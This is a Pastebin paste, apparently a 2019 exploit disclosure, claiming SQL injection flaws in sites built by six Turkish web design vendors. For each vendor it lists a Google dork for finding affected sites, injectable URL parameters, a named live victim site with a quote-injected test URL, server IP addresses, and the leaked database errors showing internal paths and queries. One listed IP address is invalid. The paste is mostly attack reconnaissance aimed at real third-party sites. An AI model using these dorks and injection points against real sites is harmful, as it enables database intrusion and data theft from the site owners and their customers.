API tools faq
paste
Advertisement
KingSkrupellos

6 Different Vendors Web Designs SQL Injection 24/01/2019

KingSkrupellos
Jan 25th, 2019
1,379
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.29 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/01/2019
  7. # Vendor Homepages of 6 Products :
  8. 1) devsoft.com.tr
  9. 2) btmbilisim.com ~ btmarge.com
  10. 3) algoritma.com.tr
  11. 4) mplusnet.com
  12. 5) webicerik.com
  13. 6) verisay.com
  14. # Tested On : Windows and Linux
  15. # Category : WebApps
  16. # Exploit Risk : Medium
  17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  18. Special Elements used in an SQL Command ('SQL Injection') ]
  19. # CXSecurity Exploit Reference Link :
  20. cxsecurity.com/issue/WLB-2019010237
  21.  
  22. ####################################################################
  23.  
  24. # There are 6 vendors that their products suffer from remote SQL Injection Vulnerabilities.
  25. ***************************************************************************
  26.  
  27. 1) Web Yazılım Devsoft Turkish SQL Injection Vulnerability => [ Vendor ] => devsoft.com.tr
  28.  
  29. 2) BTMArgeBilişim SQL Injection Vulnerability => [ Vendor ] => btmbilisim.com ~ btmarge.com
  30.  
  31. 3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability => [ Vendor ] => algoritma.com.tr
  32.  
  33. 4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability => [ Vendor ] => mplusnet.com
  34.  
  35. 5) Webİcerik SQL Injection Vulnerability => [ Vendor ] => webicerik.com
  36.  
  37. 6) Verisay Web Tasarım SQL Injection Vulnerability => [ Vendor ] => verisay.com
  38.  
  39. ####################################################################
  40.  
  41. # Google Dorks for Vulnerable Different Products ;
  42. ********************************************
  43.  
  44. 1) intext:''Web Yazılım: Devsoft''
  45.  
  46. 2) intext:''Tüm hakları saklıdır. BTM ARGE.''
  47.  
  48. 3) intext:''www.algoritma.com.tr"
  49.  
  50. 4) intext:''Powered By M.Ceylan'' site:tr
  51.  
  52. 5) intext:Webİcerik Kurumsal
  53.  
  54. 6) intext:Verisay Web Tasarım
  55.  
  56. ####################################################################
  57.  
  58. 1) Web Yazılım Devsoft SQL Injection Vulnerability
  59. ********************************************
  60.  
  61. # Google Dork :
  62. ****************
  63. intext:''Web Yazılım: Devsoft''
  64.  
  65. # SQL Injection Exploit :
  66. **********************
  67. /urunler.php?id=[SQL Injection]
  68.  
  69. /page.php?id=[SQL Injection]
  70.  
  71. /haber.php?id=[SQL Injection]
  72.  
  73. # Example Vulnerable Site :
  74. ************************
  75. [+] adabroker.com.tr/urunler.php?id=90%27
  76.  
  77. Note : (94.73.151.155) => There are 338 domains hosted on this server.
  78.  
  79. Note : (159.69.91.216) => There are 44 domains hosted on this server.
  80.  
  81. # SQL Database Error :
  82. *********************
  83. HATA : You have an error in your SQL syntax; check the manual that
  84.  
  85. corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
  86.  
  87. ####################################################################
  88.  
  89. 2) BTMArgeBilişim SQL Injection Vulnerability
  90. ****************************************
  91.  
  92. # Google Dork :
  93. ****************
  94. intext:''Tüm hakları saklıdır. BTM ARGE.''
  95.  
  96. # SQL Injection Exploit :
  97. **********************
  98. /urun_detay.php?ID=[SQL Injection]
  99.  
  100. # Example Vulnerable Site :
  101. ************************
  102. [+] habibmetal.com/urun_detay.php?ID=1'
  103.  
  104. Note : (213.128.66.82) => There are 543 domains hosted on this server.
  105.  
  106. Note : (35.243.133.12) => There are 2 domains hosted on this server.
  107.  
  108. # SQL Database Error :
  109. **********************
  110. Notice: Undefined index: GBilgi in /home/habibmetal/public_html/incfi/inc_footer.php on line 12
  111.  
  112. ####################################################################
  113.  
  114. 3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability
  115. **********************************************************
  116.  
  117. # Google Dork :
  118. ****************
  119. intext:''www.algoritma.com.tr"
  120.  
  121. # SQL Injection Exploit :
  122. **********************
  123. /urun.php?id=[SQL Injection]
  124.  
  125. /urunler.php?id=[SQL Injection]
  126.  
  127. # Example Vulnerable Site :
  128. ************************
  129. [+] ozgordal.com.tr/urun.php?id=15%27
  130.  
  131. Note : (94.73.146.96) => There are 220 domains hosted on this server.
  132.  
  133. Note : (93.187.206.206) => There are 693 domains hosted on this server.
  134.  
  135. # SQL Database Error :
  136. **********************
  137. select * from yenilikler where id=15'
  138.  
  139. select * from kategoriler where id=6'
  140.  
  141. ####################################################################
  142.  
  143. 4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability
  144. **************************************************
  145.  
  146. # Google Dork :
  147. ****************
  148. intext:''Powered By M.Ceylan'' site:tr
  149.  
  150. # SQL Injection Exploit :
  151. **********************
  152. /match.php?id_match=[SQL Injection]
  153.  
  154. /lig/consult/istatistik.php?equipe=[SQL Injection]
  155.  
  156. # Example Vulnerable Site :
  157. ************************
  158. [+] alanyaspor.org.tr/match.php?id_match=871%27
  159.  
  160. Note : (31.169.73.251) => There are 1 domains hosted on this server.
  161.  
  162. Note : (31.169.73.242) => There are 58 domains hosted on this server.
  163.  
  164. # SQL Database Error :
  165. **********************
  166. Warning: mysql_fetch_array() expects parameter 1 to be
  167.  
  168. resource, boolean given in /home/alanyaspor/public_html/match.php on line 62
  169.  
  170. ####################################################################
  171.  
  172. 5) Webİcerik SQL Injection Vulnerability
  173. ************************************
  174. # Google Dork :
  175. ****************
  176. intext:Webİcerik Kurumsal
  177.  
  178. # SQL Injection Exploit :
  179. **********************
  180. /index.php?page=mod_video_goster&videoID=[SQL Injection]
  181.  
  182. /ENG/index.php?page=icerikgoster&menuID=[SQL Injection]
  183.  
  184. # Example Vulnerable Site :
  185. ************************
  186. tcma.org.tr/index.php?page=mod_video_goster&videoID=12%27
  187.  
  188. Note : (77.92.99.319) => 1 Domain.
  189.  
  190. Note : (77.92.99.31) => There are 13 domains hosted on this server.
  191.  
  192. # SQL Database Error :
  193. **********************
  194. Warning: mysql_fetch_assoc(): supplied argument is not a valid
  195.  
  196. MySQL result resource in /var/www/vhosts/tcma.org.tr
  197.  
  198. /tcma.org.tr/ENG/lib/emit_icerik.php on line 323
  199.  
  200. ####################################################################
  201.  
  202. 6) Verisay Web Tasarım SQL Injection Vulnerability
  203. *********************************************
  204. # Google Dork :
  205. ****************
  206. intext:Verisay Web Tasarım
  207.  
  208. # SQL Injection Exploit :
  209. **********************
  210. /urunler/urun_detay.php?id=[SQL Injection]
  211.  
  212. # Example Vulnerable Site :
  213. ************************
  214. [+] irena.com.tr/urunler/urun_detay.php?id=1465%27
  215.  
  216. Note : (89.19.29.4) => There are 130 domains hosted on this server.
  217.  
  218. Note : (52.19.74.107) => There are 10 domains hosted on this server.
  219.  
  220. # SQL Database Error :
  221. **********************
  222. SELECT DEGER FROM gnl_ayarlar WHERE ANAHTAR='SITEBASLIK'
  223.  
  224. Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean
  225.  
  226. given in D:\vhosts\irena.com.tr\http\libs\lib-data.php on line 15
  227.  
  228. SELECT d.ID, d.SIPARIS_ID, d.URUN_ID, d.MIKTAR, sto_kod AS KOD,
  229. sto_birim2_katsayi AS QUANTITY, sto_birim2_boy * sto_birim2_en *
  230. sto_birim2_yukseklik / 1000000000 AS VOLUME, sto_birim2_agirlik AS
  231. GROSSWEIGHT, sfiyat_fiyati AS UNIT_PRICE FROM sip_siparis_detay
  232. d LEFT JOIN sip_siparis s ON s.ID = d.SIPARIS_ID LEFT JOIN urun_urun
  233. u ON u.ID = d.URUN_ID WHERE DURUM = 0 AND s.MUSTERI_ID = ''
  234.  
  235. ####################################################################
  236.  
  237. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  238.  
  239. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!